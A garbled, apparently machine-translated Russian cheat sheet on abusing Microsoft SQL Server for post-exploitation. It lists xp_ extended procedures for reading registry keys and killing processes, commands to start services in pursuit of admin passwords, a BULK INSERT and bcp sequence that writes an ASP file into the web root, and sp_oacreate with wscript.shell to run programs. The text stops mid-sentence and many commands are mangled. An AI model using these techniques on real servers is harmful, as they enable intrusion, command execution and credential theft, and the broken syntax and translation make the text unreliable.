Некоторые расширения SQL
xp_regaddmultistring
xp_regdeletekey delete wame ключа
xp_regdeletevalatuate ключа
xp_regenumkeys enum
xp_regenumValues
xp_regread для
xp_regremovemultistring
xp_regwrite написать
xp_availablemedia view Drive
xp_dirrtree просмотреть каталог
XP_ENUMDSNODBC Источник данных
xp_loginconfig Информация о некоторой конфигурации безопасности сервера
Пакет xp_makecab, сначала можно использовать некоторые разрешения DBO
XP_NTSEC_ENUMDOMANES ENUM Доменное имя, связанная информация
xp_terminate_process terminal Process и IP
xp_logininfo в настоящее время
sp_configure извлекает контент в базе данных (я думаю, что это весьма полезно)
SP_HELPEXTENDPROC получает все расширения хранения
SP_WHO2 пользователей пользователей, хост, в котором они входят, операции, которые они выполняют в базе данных, и т. Д.
Некоторая сетевая информация
execxp_regreadhkey_local_machine,
'System/CurrentControlset/Services/Lanmanerver/Parameters',
'NullsessionShares'
SNMP Assisted Network Cruitiny
execxp_regenumvalueshkey_local_machine,
'System/CurrentControlSet/Services/SNMP/PARAMETERS/VALIDCOMM
Единицы
Запустите некоторые системные службы, такие как Telnet, и вы можете прийти к администратору или некоторым системным паролям.
execmaster..xp_serviceControl'Start ',' Расписание '
execmaster..xp_serviceControl'Start ',' Server '
Sp_addextendendproc'xp_webserver ',' c: /temp/xp_foo.dll 'Это расширение может запустить программу
Используйте синтаксис «Bulkinsert», чтобы вставить текстовый файл во временную таблицу. Просто создайте эту таблицу:
Createletablefoo (Linevarchar (8000))
Затем выполните операцию BulkinSert, чтобы вставить данные в файл в таблицу, например:
bulkinsertfoofrom'c: /inetpub/wwwroot/admin/inc.asp '
BCP "SELECT*OutText..FOO" QueryOutc: /inetPub/wwwroot/runcommand.asp-c-slocalhost-usa-pfoobar
Параметр «S» - это сервер, который выполняет запрос, параметр «U» - это имя пользователя, параметр «P» - это пароль, вот «Foobar»
Несколько встроенных хранимых процедур представлены в SQLServer, которые позволяют создавать автоматические сценарии ActiveX. Эти сценарии такие же, как сценарии, работающие под интерпретатором скрипта Windows, или программы сценариев ASP - они используют VBScript или JavaScript для создания и взаимодействия с ними. Автоматический скрипт выполнения с использованием этого метода может сделать что угодно в Transact-SQL в сценариях ASP или в сценариях WSH.
Используйте объект 'wscript.shell', чтобы создать экземпляр блокнота:
объявить@oint
execsp_oacreate'wscript.shell ',@oout
execsp_oamethod@o, 'run', null, notepad.exe '
Указать, чтобы выполнить его после имени пользователя: